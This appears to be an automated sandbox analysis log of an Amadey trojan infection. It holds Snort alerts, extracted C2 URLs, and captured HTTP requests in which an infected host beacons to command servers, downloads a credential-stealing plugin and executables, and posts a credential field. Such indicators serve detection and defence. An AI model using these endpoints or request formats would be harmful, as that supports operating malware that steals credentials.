                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50199 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50201 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50202 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50204 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50205 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50203 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50206 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50207 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50209 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50208 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50210 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50211 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50212 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50214 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50213 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50215 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50216 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50217 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50219 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50218 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50220 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50221 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50222 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50224 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50225 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50223 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50226 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50227 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50229 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50228 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50230 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50231 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50232 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50234 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50233 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50235 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50236 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50239 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50238 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50237 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50240 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50241 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50243 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50244 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50242 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50245 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50246 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50248 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50250 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50247 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50249 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50251 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50253 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50252 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50254 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50255 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50256 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50257 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50258 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50259 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50261 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50260 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50263 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50262 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50264 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50265 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50267 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50268 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50266 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50270 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50269 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50272 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50273 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50271 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50274 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50275 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50277 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50278 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50276 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50279 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50280 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50282 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50284 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50281 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50283 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50286 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50288 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50289 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50287 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50290 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50291 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50293 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50294 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50292 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50296 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50295 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50298 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50297 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50299 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50300 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50301 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50303 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50304 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50302 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50305 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50306 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50307 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50309 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50310 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50308 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50311 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50313 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50312 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50314 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50315 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50316 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50317 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50318 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50319 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50320 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50321 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50323 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50324 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50322 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50325 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50326 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50327 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50330 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50329 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50328 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50332 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50331 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50334 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50335 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50336 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50337 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50338 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50333 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50339 -> 62.204.41.109:80
                                Source: global trafficTCP traffic: 82.115.223.15 ports 15486,1,4,5,6,8
                                Source: Malware configuration extractorURLs: 45.32.200.113/mBsjv2swweP/index.php
                                Source: Malware configuration extractorURLs: http://ex3mall.com/lancer/get.php
                                Source: Malware configuration extractorURLs: 82.115.223.15:15486
                                Source: Malware configuration extractorURLs: http://skinndia.com/tmp/
                                Source: Malware configuration extractorURLs: http://cracker.biz/tmp/
                                Source: Malware configuration extractorURLs: http://piratia-life.ru/tmp/
                                Source: global trafficHTTP traffic detected: GET /8FXL68lvT7aMOUnACctqFTpqMRLtKqig9DEVpznPBh3kfqwD7H79IAr5YozSDHvqNJm1rAPxQcx2k1enZvClj3H5usqn8UYjyOXsusjFmGFLGWsE0IbrN51N2lt+X5GPvg6rlAPc7/z2I61aZ8FweIkQbGze+SDp/n9gfKAvEXzNpg== HTTP/1.1Host: 23.236.181.126
                                Source: global trafficHTTP traffic detected: GET /attachments/1059906296494686404/1060299047027613706/2.0.3-beta.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=ig4V6Bb52gMi05i2ty2QJMYY09WLeixE7KU4oSGFpMo-1672905581-0-ATpYTniRjaqpm5e9kq1sl0EntPiQOxpA1dSU9qlQv/9ZISlimeC5/eQ3izuUGJlIz92YWT6p0s0D/s8CFgyx90Y=
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: GET /Nmkn5d9Dn/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.109
                                Source: global trafficHTTP traffic detected: GET /Legno.exe HTTP/1.1Host: 45.66.230.123
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 30 30 31 33 30 30 31 26 75 6e 69 74 3d 38 35 33 33 32 31 39 33 35 32 31 32 Data Ascii: e1=1000013001&unit=853321935212
                                Source: global trafficHTTP traffic detected: GET /ano/anon.exe HTTP/1.1Host: 62.204.41.145
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 34 30 30 31 26 75 6e 69 74 3d 38 35 33 33 32 31 39 33 35 32 31 32 Data Ascii: d1=1000014001&unit=853321935212
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 35 30 33 32 26 75 6e 69 74 3d 38 35 33 33 32 31 39 33 35 32 31 32 Data Ascii: d1=1000015032&unit=853321935212
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Host: 62.204.41.109Content-Length: 21Content-Type: application/x-www-form-urlencodedData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 63 72 65 64 3d Data Ascii: id=853321935212&cred=
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
